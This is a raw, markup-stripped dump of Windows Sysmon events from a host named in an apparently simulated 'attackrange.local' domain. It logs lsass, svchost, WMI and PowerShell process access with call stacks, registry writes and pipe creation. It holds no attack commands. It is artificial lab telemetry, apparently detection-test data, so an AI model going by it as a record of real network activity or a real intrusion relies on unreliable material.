12:00:49.659{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:49.659{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.596{266CAFBE-646C-6064-1000-00000000AE01}11242508C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL3
2.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.580{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.580{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:49.565{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:49.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.549{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:49.549{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.549{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:49.252{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000392) 13241300x80000000000000001395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:49.127{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 17141700x80000000000000001394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:48.862{266CAFBE-646E-6064-1900-00000000AE01}2276\PSHost.132616656461464114.2276.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 17141700x80000000000000001393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:48.862{266CAFBE-646E-6064-1B00-00000000AE01}2292\PSHost.132616656461682956.2292.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 11241100x80000000000000001392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.674{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Windows\Temp\__PSScriptPolicyTest_0ahsxzwi.tlc.ps12021-03-31 12:00:48.674 10341000x80000000000000001391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:48.627{266CAFBE-646C-6064-1200-00000000AE01}11961472C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:48.627{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.612{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:48.549{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000001385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.502{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_4hkwd3pk.0id.ps12021-03-31 12:00:48.502 11241100x80000000000000001384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.502{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ps5qufdy.yg2.ps12021-03-31 12:00:48.502 10341000x80000000000000001383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:48.440{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:48.440{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:47.799{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:47.315{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x00000391) 10341000x80000000000000002419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.973{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-5300-00000000AE01}3776C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:03.973{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.973{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
